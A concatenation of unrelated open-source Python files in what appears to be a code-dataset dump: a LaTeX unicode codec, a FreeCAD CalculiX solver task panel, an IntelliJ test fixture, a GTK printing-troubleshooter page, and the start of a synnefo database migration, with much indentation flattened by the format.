self.register(u'\N{GREEK SMALL LETTER NU}', b'\\nu', mode='math')
self.register(u'\N{GREEK SMALL LETTER XI}', b'\\xi', mode='math')
self.register(u'\N{GREEK SMALL LETTER OMICRON}', b'\\omicron', mode='math')
self.register(u'\N{GREEK SMALL LETTER PI}', b'\\pi', mode='math')
self.register(u'\N{GREEK SMALL LETTER RHO}', b'\\rho', mode='math')
self.register(u'\N{GREEK SMALL LETTER SIGMA}', b'\\sigma', mode='math')
self.register(u'\N{GREEK SMALL LETTER TAU}', b'\\tau', mode='math')
self.register(u'\N{GREEK SMALL LETTER UPSILON}', b'\\upsilon', mode='math')
self.register(u'\N{GREEK SMALL LETTER PHI}', b'\\phi', mode='math')
self.register(u'\N{GREEK SMALL LETTER CHI}', b'\\chi', mode='math')
self.register(u'\N{GREEK SMALL LETTER PSI}', b'\\psi', mode='math')
self.register(u'\N{GREEK SMALL LETTER OMEGA}', b'\\omega', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER ALPHA}', b'\\Alpha', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER BETA}', b'\\Beta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER GAMMA}', b'\\Gamma', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER DELTA}', b'\\Delta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER EPSILON}', b'\\Epsilon', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER ZETA}', b'\\Zeta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER ETA}', b'\\Eta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER THETA}', b'\\Theta', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER IOTA}', b'\\Iota', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER KAPPA}', b'\\Kappa', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER LAMDA}', b'\\Lambda', mode='math') # LAMDA not LAMBDA
self.register(u'\N{GREEK CAPITAL LETTER MU}', b'\\Mu', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER NU}', b'\\Nu', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER XI}', b'\\Xi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER OMICRON}', b'\\Omicron', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER PI}', b'\\Pi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER RHO}', b'\\Rho', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER SIGMA}', b'\\Sigma', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER TAU}', b'\\Tau', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER UPSILON}', b'\\Upsilon', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER PHI}', b'\\Phi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER CHI}', b'\\Chi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER PSI}', b'\\Psi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER OMEGA}', b'\\Omega', mode='math')
self.register(u'\N{COPYRIGHT SIGN}', b'\\copyright')
self.register(u'\N{COPYRIGHT SIGN}', b'\\textcopyright')
self.register(u'\N{LATIN CAPITAL LETTER A WITH ACUTE}', b"\\'A")
self.register(u'\N{LATIN CAPITAL LETTER I WITH ACUTE}', b"\\'I")
self.register(u'\N{HORIZONTAL ELLIPSIS}', b'\\ldots')
self.register(u'\N{TRADE MARK SIGN}', b'^{TM}', mode='math')
self.register(u'\N{TRADE MARK SIGN}', b'\\texttrademark', package='textcomp')
def register(self, unicode_text, latex_text, mode='text', package=None,
decode=True, encode=True):
if package is not None:
# TODO implement packages
pass
if mode == 'math':
# also register text version
self.register(unicode_text, b'$' + latex_text + b'$', mode='text',
package=package, decode=decode, encode=encode)
# XXX for the time being, we do not perform in-math substitutions
return
# tokenize, and register unicode translation
tokens = tuple(self.lexer.get_tokens(latex_text, final=True))
if decode:
self.max_length = max(self.max_length, len(tokens))
if not tokens in self.unicode_map:
self.unicode_map[tokens] = unicode_text
# also register token variant with brackets, if appropriate
# for instance, "\'{e}" for "\'e", "\c{c}" for "\c c", etc.
# note: we do not remove brackets (they sometimes matter,
# e.g. bibtex uses them to prevent lower case transformation)
if (len(tokens) == 2
and tokens[0].name.startswith('control')
and tokens[1].name == 'chars'):
alt_tokens = (
tokens[0], latex_lexer.Token('chars', b'{'),
tokens[1], latex_lexer.Token('chars', b'}'),
)
if not alt_tokens in self.unicode_map:
self.unicode_map[alt_tokens] = u"{" + unicode_text + u"}"
if encode and unicode_text not in self.latex_map:
self.latex_map[unicode_text] = (latex_text, tokens)
_LATEX_UNICODE_TABLE = LatexUnicodeTable(latex_lexer.LatexIncrementalDecoder())
# incremental encoder does not need a buffer
# but decoder does
class LatexIncrementalEncoder(latex_lexer.LatexIncrementalEncoder):
"""Translating incremental encoder for latex. Maintains a state to
determine whether control spaces etc. need to be inserted.
"""
table = _LATEX_UNICODE_TABLE
"""Translation table."""
def __init__(self, errors='strict'):
latex_lexer.LatexIncrementalEncoder.__init__(self, errors=errors)
self.reset()
def reset(self):
self.state = 'M'
def get_space_bytes(self, bytes_):
"""Inserts space bytes in space eating mode."""
if self.state == 'S':
# in space eating mode
# control space needed?
if bytes_.startswith(b' '):
# replace by control space
return b'\\ ', bytes_[1:]
else:
# insert space (it is eaten, but needed for separation)
return b' ', bytes_
else:
return b'', bytes_
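    # Example of the space-eating state (sketch, via the registered 'latex'
    # codec): u'\xa3x' encodes to b'\\pounds x' (a separator space that
    # latex itself eats), while u'\xa3 x' encodes to b'\\pounds\\ x' (the
    # real space is protected as a control space).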
    def get_latex_bytes(self, unicode_, final=False):
        """:meth:`encode` calls this function to produce the final
        sequence of latex bytes. Each character is first encoded in the
        *inputenc* encoding; characters that cannot be represented there
        are translated through the latex table, or handled according to
        the error policy.
        """
if not isinstance(unicode_, basestring):
raise TypeError(
"expected unicode for encode input, but got {0} instead"
.format(unicode_.__class__.__name__))
# convert character by character
for pos, c in enumerate(unicode_):
# attempt input encoding first
# if this succeeds, then we don't need a latex representation
try:
bytes_ = c.encode(self.inputenc, 'strict')
except UnicodeEncodeError:
pass
else:
space, bytes_ = self.get_space_bytes(bytes_)
self.state = 'M'
if space:
yield space
yield bytes_
continue
# inputenc failed; let's try the latex equivalents
# of common unicode characters
try:
bytes_, tokens = self.table.latex_map[c]
except KeyError:
# translation failed
                if self.errors == 'strict':
                    raise UnicodeEncodeError(
                        "latex", # codec
                        unicode_, # problematic input
                        pos, pos + 1, # location of problematic character
                        "don't know how to translate {1} ({0}) into latex"
                        .format(c, repr(c)))
                elif self.errors == 'ignore':
                    pass
                elif self.errors == 'replace':
                    # use the \\char command
                    # this assumes
                    # \usepackage[T1]{fontenc}
                    # \usepackage[utf8]{inputenc}
                    yield b'{\\char'
                    yield str(ord(c)).encode("ascii")
                    yield b'}'
                    self.state = 'M'
                else:
                    raise ValueError(
                        "latex codec does not support {0} errors"
                        .format(self.errors))
else:
# translation succeeded
space, bytes_ = self.get_space_bytes(bytes_)
# update state
if tokens[-1].name == 'control_word':
# we're eating spaces
self.state = 'S'
else:
self.state = 'M'
if space:
yield space
yield bytes_
class LatexIncrementalDecoder(latex_lexer.LatexIncrementalDecoder):
"""Translating incremental decoder for latex."""
table = _LATEX_UNICODE_TABLE
"""Translation table."""
    def __init__(self, errors='strict'):
        latex_lexer.LatexIncrementalDecoder.__init__(self)
        self.errors = errors
def reset(self):
latex_lexer.LatexIncrementalDecoder.reset(self)
self.token_buffer = []
# python codecs API does not support multibuffer incremental decoders
def getstate(self):
raise NotImplementedError
def setstate(self, state):
raise NotImplementedError
def get_unicode_tokens(self, bytes_, final=False):
for token in self.get_tokens(bytes_, final=final):
# at this point, token_buffer does not match anything
self.token_buffer.append(token)
# new token appended at the end, see if we have a match now
# note: match is only possible at the *end* of the buffer
# because all other positions have already been checked in
# earlier iterations
for i in range(1, len(self.token_buffer) + 1):
last_tokens = tuple(self.token_buffer[-i:]) # last i tokens
try:
unicode_text = self.table.unicode_map[last_tokens]
except KeyError:
# no match: continue
continue
else:
# match!! flush buffer, and translate last bit
for token in self.token_buffer[:-i]: # exclude last i tokens
yield token.decode(self.inputenc)
yield unicode_text
self.token_buffer = []
break
# flush tokens that can no longer match
while len(self.token_buffer) >= self.table.max_length:
yield self.token_buffer.pop(0).decode(self.inputenc)
# also flush the buffer at the end
if final:
for token in self.token_buffer:
yield token.decode(self.inputenc)
self.token_buffer = []
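# Decoding walk-through (sketch): feeding b"\\'e" buffers the control token
# \' and then the chars token e; the two-token tuple matches unicode_map and
# is flushed as u'\xe9', while any unmatched leading tokens are decoded
# through the inputenc encoding instead.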
class LatexCodec(codecs.Codec):
IncrementalEncoder = None
IncrementalDecoder = None
def encode(self, unicode_, errors='strict'):
"""Convert unicode string to latex bytes."""
return (
self.IncrementalEncoder(errors=errors).encode(unicode_, final=True),
len(unicode_),
)
def decode(self, bytes_, errors='strict'):
"""Convert latex bytes to unicode string."""
return (
self.IncrementalDecoder(errors=errors).decode(bytes_, final=True),
len(bytes_),
)
def find_latex(encoding):
# check if requested codec info is for latex encoding
if not encoding.startswith('latex'):
return None
# set up all classes with correct latex input encoding
inputenc_ = encoding[6:] if encoding.startswith('latex+') else 'ascii'
class IncrementalEncoder_(LatexIncrementalEncoder):
inputenc = inputenc_
class IncrementalDecoder_(LatexIncrementalDecoder):
inputenc = inputenc_
class Codec(LatexCodec):
IncrementalEncoder = IncrementalEncoder_
IncrementalDecoder = IncrementalDecoder_
class StreamWriter(Codec, codecs.StreamWriter):
pass
class StreamReader(Codec, codecs.StreamReader):
pass
return codecs.CodecInfo(
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder_,
incrementaldecoder=IncrementalDecoder_,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
codecs.register(find_latex)
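if __name__ == '__main__':
    # Minimal round-trip sketch: the codec search function was registered
    # just above, so 'latex' (and 'latex+<enc>') lookups work from here on.
    print(repr(b"\\'el\\`eve".decode('latex')))  # -> u'\xe9l\xe8ve'
    print(repr(u'\N{EM DASH} and \N{POUND SIGN}'.encode('latex')))  # -> '--- and \\pounds'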
|
chrisjaquet/FreeCAD | refs/heads/master | src/Mod/Fem/_TaskPanelFemSolverCalculix.py | 1 | # ***************************************************************************
# * *
# * Copyright (c) 2013-2015 - Juergen Riegel <FreeCAD@juergen-riegel.net> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
__title__ = "CalculiX Job Control Task Panel"
__author__ = "Juergen Riegel"
__url__ = "http://www.freecadweb.org"
import FemToolsCcx
import FreeCAD
import os
import time
if FreeCAD.GuiUp:
import FreeCADGui
import FemGui
from PySide import QtCore, QtGui
from PySide.QtCore import Qt
from PySide.QtGui import QApplication
class _TaskPanelFemSolverCalculix:
def __init__(self, solver_object):
self.form = FreeCADGui.PySideUic.loadUi(FreeCAD.getHomePath() + "Mod/Fem/TaskPanelFemSolverCalculix.ui")
self.fem_prefs = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Fem")
ccx_binary = self.fem_prefs.GetString("ccxBinaryPath", "")
if ccx_binary:
self.CalculixBinary = ccx_binary
print ("Using CalculiX binary path from FEM preferences: {}".format(ccx_binary))
else:
from platform import system
if system() == 'Linux':
self.CalculixBinary = 'ccx'
elif system() == 'Windows':
self.CalculixBinary = FreeCAD.getHomePath() + 'bin/ccx.exe'
else:
self.CalculixBinary = 'ccx'
self.solver_object = solver_object
self.Calculix = QtCore.QProcess()
self.Timer = QtCore.QTimer()
self.Timer.start(300)
self.fem_console_message = ''
# Connect Signals and Slots
QtCore.QObject.connect(self.form.tb_choose_working_dir, QtCore.SIGNAL("clicked()"), self.choose_working_dir)
QtCore.QObject.connect(self.form.pb_write_inp, QtCore.SIGNAL("clicked()"), self.write_input_file_handler)
QtCore.QObject.connect(self.form.pb_edit_inp, QtCore.SIGNAL("clicked()"), self.editCalculixInputFile)
QtCore.QObject.connect(self.form.pb_run_ccx, QtCore.SIGNAL("clicked()"), self.runCalculix)
QtCore.QObject.connect(self.form.rb_static_analysis, QtCore.SIGNAL("clicked()"), self.select_static_analysis)
QtCore.QObject.connect(self.form.rb_frequency_analysis, QtCore.SIGNAL("clicked()"), self.select_frequency_analysis)
QtCore.QObject.connect(self.Calculix, QtCore.SIGNAL("started()"), self.calculixStarted)
QtCore.QObject.connect(self.Calculix, QtCore.SIGNAL("stateChanged(QProcess::ProcessState)"), self.calculixStateChanged)
QtCore.QObject.connect(self.Calculix, QtCore.SIGNAL("error(QProcess::ProcessError)"), self.calculixError)
QtCore.QObject.connect(self.Calculix, QtCore.SIGNAL("finished(int)"), self.calculixFinished)
QtCore.QObject.connect(self.Timer, QtCore.SIGNAL("timeout()"), self.UpdateText)
self.update()
def femConsoleMessage(self, message="", color="#000000"):
self.fem_console_message = self.fem_console_message + '<font color="#0000FF">{0:4.1f}:</font> <font color="{1}">{2}</font><br>'.\
format(time.time() - self.Start, color, message.encode('utf-8', 'replace'))
self.form.textEdit_Output.setText(self.fem_console_message)
self.form.textEdit_Output.moveCursor(QtGui.QTextCursor.End)
def printCalculiXstdout(self):
out = self.Calculix.readAllStandardOutput()
if out.isEmpty():
self.femConsoleMessage("CalculiX stdout is empty", "#FF0000")
else:
try:
out = unicode(out, 'utf-8', 'replace')
rx = QtCore.QRegExp("\\*ERROR.*\\n\\n")
rx.setMinimal(True)
pos = rx.indexIn(out)
while not pos < 0:
match = rx.cap(0)
FreeCAD.Console.PrintError(match.strip().replace('\n', ' ') + '\n')
pos = rx.indexIn(out, pos + 1)
out = os.linesep.join([s for s in out.splitlines() if s])
self.femConsoleMessage(out.replace('\n', '<br>'))
except UnicodeDecodeError:
self.femConsoleMessage("Error converting stdout from CalculiX", "#FF0000")
def UpdateText(self):
if(self.Calculix.state() == QtCore.QProcess.ProcessState.Running):
self.form.l_time.setText('Time: {0:4.1f}: '.format(time.time() - self.Start))
def calculixError(self, error):
print ("Error() {}".format(error))
self.femConsoleMessage("CalculiX execute error: {}".format(error), "#FF0000")
def calculixStarted(self):
print ("calculixStarted()")
print (self.Calculix.state())
self.form.pb_run_ccx.setText("Break CalculiX")
def calculixStateChanged(self, newState):
if (newState == QtCore.QProcess.ProcessState.Starting):
self.femConsoleMessage("Starting CalculiX...")
if (newState == QtCore.QProcess.ProcessState.Running):
self.femConsoleMessage("CalculiX is running...")
if (newState == QtCore.QProcess.ProcessState.NotRunning):
self.femConsoleMessage("CalculiX stopped.")
def calculixFinished(self, exitCode):
print ("calculixFinished() {}".format(exitCode))
print (self.Calculix.state())
# Restore previous cwd
QtCore.QDir.setCurrent(self.cwd)
self.printCalculiXstdout()
self.Timer.stop()
self.femConsoleMessage("CalculiX done!", "#00AA00")
self.form.pb_run_ccx.setText("Re-run CalculiX")
self.femConsoleMessage("Loading result sets...")
self.form.l_time.setText('Time: {0:4.1f}: '.format(time.time() - self.Start))
fea = FemToolsCcx.FemToolsCcx(None, self.solver_object)
fea.reset_mesh_purge_results_checked()
fea.inp_file_name = self.inp_file_name
QApplication.setOverrideCursor(Qt.WaitCursor)
fea.load_results()
QApplication.restoreOverrideCursor()
self.form.l_time.setText('Time: {0:4.1f}: '.format(time.time() - self.Start))
def getStandardButtons(self):
return int(QtGui.QDialogButtonBox.Close)
def update(self):
'fills the widgets'
self.form.le_working_dir.setText(self.solver_object.WorkingDir)
if self.solver_object.AnalysisType == 'static':
self.form.rb_static_analysis.setChecked(True)
elif self.solver_object.AnalysisType == 'frequency':
self.form.rb_frequency_analysis.setChecked(True)
return
def accept(self):
FreeCADGui.ActiveDocument.resetEdit()
def reject(self):
FreeCADGui.ActiveDocument.resetEdit()
def choose_working_dir(self):
current_wd = self.setup_working_dir()
wd = QtGui.QFileDialog.getExistingDirectory(None, 'Choose CalculiX working directory',
current_wd)
if wd:
self.solver_object.WorkingDir = wd
else:
self.solver_object.WorkingDir = current_wd
self.form.le_working_dir.setText(self.solver_object.WorkingDir)
def write_input_file_handler(self):
QApplication.restoreOverrideCursor()
if self.check_prerequisites_helper():
QApplication.setOverrideCursor(Qt.WaitCursor)
self.inp_file_name = ""
fea = FemToolsCcx.FemToolsCcx(None, self.solver_object)
fea.set_analysis_type(self.solver_object.AnalysisType)
fea.update_objects()
fea.write_inp_file()
if fea.inp_file_name != "":
self.inp_file_name = fea.inp_file_name
self.femConsoleMessage("Write completed.")
self.form.pb_edit_inp.setEnabled(True)
self.form.pb_run_ccx.setEnabled(True)
else:
self.femConsoleMessage("Write .inp file failed!", "#FF0000")
QApplication.restoreOverrideCursor()
def check_prerequisites_helper(self):
self.Start = time.time()
self.femConsoleMessage("Check dependencies...")
self.form.l_time.setText('Time: {0:4.1f}: '.format(time.time() - self.Start))
fea = FemToolsCcx.FemToolsCcx(None, self.solver_object)
fea.update_objects()
message = fea.check_prerequisites()
if message != "":
            QtGui.QMessageBox.critical(None, "Missing prerequisite(s)", message)
return False
return True
def start_ext_editor(self, ext_editor_path, filename):
if not hasattr(self, "ext_editor_process"):
self.ext_editor_process = QtCore.QProcess()
if self.ext_editor_process.state() != QtCore.QProcess.Running:
self.ext_editor_process.start(ext_editor_path, [filename])
def editCalculixInputFile(self):
print ('editCalculixInputFile {}'.format(self.inp_file_name))
if self.fem_prefs.GetBool("UseInternalEditor", True):
FemGui.open(self.inp_file_name)
else:
ext_editor_path = self.fem_prefs.GetString("ExternalEditorPath", "")
if ext_editor_path:
self.start_ext_editor(ext_editor_path, self.inp_file_name)
else:
print ("External editor is not defined in FEM preferences. Falling back to internal editor")
FemGui.open(self.inp_file_name)
def runCalculix(self):
print ('runCalculix')
self.Start = time.time()
self.femConsoleMessage("CalculiX binary: {}".format(self.CalculixBinary))
self.femConsoleMessage("Run CalculiX...")
# run Calculix
print ('run CalculiX at: {} with: {}'.format(self.CalculixBinary, os.path.splitext(self.inp_file_name)[0]))
# change cwd because ccx may crash if directory has no write permission
# there is also a limit of the length of file names so jump to the document directory
self.cwd = QtCore.QDir.currentPath()
fi = QtCore.QFileInfo(self.inp_file_name)
QtCore.QDir.setCurrent(fi.path())
self.Calculix.start(self.CalculixBinary, ['-i', fi.baseName()])
QApplication.restoreOverrideCursor()
def select_analysis_type(self, analysis_type):
if self.solver_object.AnalysisType != analysis_type:
self.solver_object.AnalysisType = analysis_type
self.form.pb_edit_inp.setEnabled(False)
self.form.pb_run_ccx.setEnabled(False)
def select_static_analysis(self):
self.select_analysis_type('static')
def select_frequency_analysis(self):
self.select_analysis_type('frequency')
    # This function overlaps with FemTools' setup_working_dir and should be removed once we migrate fully to FemTools
def setup_working_dir(self):
wd = self.solver_object.WorkingDir
if not (os.path.isdir(wd)):
try:
os.makedirs(wd)
            except OSError:
print ("Dir \'{}\' from FEM preferences doesn't exist and cannot be created.".format(wd))
import tempfile
wd = tempfile.gettempdir()
print ("Dir \'{}\' will be used instead.".format(wd))
return wd
|
jwren/intellij-community | refs/heads/master | python/testData/quickFixes/PyMakeMethodStaticQuickFixTest/noSelf_after.py | 249 | __author__ = 'ktisha'
class Child(Base):
def __init__(self):
super(Child, self).__init__()
@staticmethod
def f():
test = 1 |
poolooloo/emind-cloud-printer | refs/heads/master | troubleshoot/Shrug.py | 6 | #!/usr/bin/python3
## Printing troubleshooter
## Copyright (C) 2008, 2009, 2010, 2011, 2012 Red Hat, Inc.
## Author: Tim Waugh <twaugh@redhat.com>
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from gi.repository import Gtk
from .base import *
class Shrug(Question):
def __init__ (self, troubleshooter):
Question.__init__ (self, troubleshooter, "Shrug")
page = self.initial_vbox (_("Sorry!"),
_("There is no obvious solution to this "
"problem. Your answers have been "
"collected together with "
"other useful information. If you "
"would like to report a bug, please "
"include this information."))
expander = Gtk.Expander.new(_("Diagnostic Output (Advanced)"))
expander.set_expanded (False)
sw = Gtk.ScrolledWindow ()
expander.add (sw)
textview = Gtk.TextView ()
textview.set_editable (False)
sw.add (textview)
page.pack_start (expander, True, True, 0)
self.buffer = textview.get_buffer ()
box = Gtk.HButtonBox ()
box.set_border_width (0)
box.set_spacing (3)
box.set_layout (Gtk.ButtonBoxStyle.END)
page.pack_start (box, False, False, 0)
self.save = Gtk.Button.new_from_stock (Gtk.STOCK_SAVE)
box.pack_start (self.save, False, False, 0)
troubleshooter.new_page (page, self)
def display (self):
self.buffer.set_text (self.troubleshooter.answers_as_text ())
return True
def connect_signals (self, handler):
self.save_sigid = self.save.connect ('clicked', self.on_save_clicked)
def disconnect_signals (self):
self.save.disconnect (self.save_sigid)
def on_save_clicked (self, button):
while True:
parent = self.troubleshooter.get_window()
dialog = Gtk.FileChooserDialog (transient_for=parent,
action=Gtk.FileChooserAction.SAVE)
dialog.add_buttons (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_SAVE, Gtk.ResponseType.OK)
dialog.set_do_overwrite_confirmation (True)
dialog.set_current_name ("troubleshoot.txt")
dialog.set_default_response (Gtk.ResponseType.OK)
dialog.set_local_only (True)
response = dialog.run ()
dialog.hide ()
if response != Gtk.ResponseType.OK:
return
try:
                with open (dialog.get_filename (), "w") as f:
                    f.write (self.buffer.get_text (start=self.buffer.get_start_iter (),
                                                   end=self.buffer.get_end_iter (),
                                                   include_hidden_chars=False))
except IOError as e:
err = Gtk.MessageDialog (parent=parent,
modal=True, destroy_with_parent=True,
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.CLOSE,
text=_("Error saving file"))
err.format_secondary_text (_("There was an error saving "
"the file:") + "\n" +
e.strerror)
err.run ()
err.destroy ()
continue
break
|
andyzsf/Cactus- | refs/heads/master | cactus/deployment/s3/__init__.py | 20 | #coding:utf-8
|
Erethon/synnefo | refs/heads/develop | snf-astakos-app/astakos/im/migrations/0050_project_logs.py | 10 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
NORMAL = 1
SUSPENDED = 10
TERMINATED = 100
class Migration(DataMigration):
def forwards(self, orm):
logs = []
suspended = orm.Project.objects.filter(state=SUSPENDED)
for project in suspended:
logs.append(orm.ProjectLog(
project=project, date=project.deactivation_date,
reason=project.deactivation_reason,
from_state=NORMAL, to_state=SUSPENDED))
terminated = orm.Project.objects.filter(state=TERMINATED)
for project in terminated:
logs.append(orm.ProjectLog(
project=project, date=project.deactivation_date,
reason=project.deactivation_reason,
from_state=NORMAL, to_state=TERMINATED))
orm.ProjectLog.objects.bulk_create(logs)
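        # Net effect (sketch): every suspended or terminated project gains
        # exactly one ProjectLog row recording the NORMAL -> SUSPENDED or
        # NORMAL -> TERMINATED transition, preserving the original
        # deactivation date and reason.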
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'im.additionalmail': {
'Meta': {'object_name': 'AdditionalMail'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"})
},
'im.approvalterms': {
'Meta': {'object_name': 'ApprovalTerms'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'im.astakosuser': {
'Meta': {'object_name': 'AstakosUser', '_ormbases': ['auth.User']},
'accepted_email': ('django.db.models.fields.EmailField', [], {'default': 'None', 'max_length': '75', 'null': 'True', 'blank': 'True'}),
'accepted_policy': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'activation_sent': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'affiliation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'auth_token_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'auth_token_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_signed_terms': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deactivated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deactivated_reason': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'disturbed_quota': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'email_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_credits': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_signed_terms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'invitations': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'is_rejected': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'level': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'moderated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'moderated_data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['im.Resource']", 'null': 'True', 'through': "orm['im.AstakosUserQuota']", 'symmetrical': 'False'}),
'rejected_reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True'}),
'verification_code': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True'}),
'verified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'im.astakosuserauthprovider': {
'Meta': {'ordering': "('module', 'created')", 'unique_together': "(('identifier', 'module', 'user'),)", 'object_name': 'AstakosUserAuthProvider'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
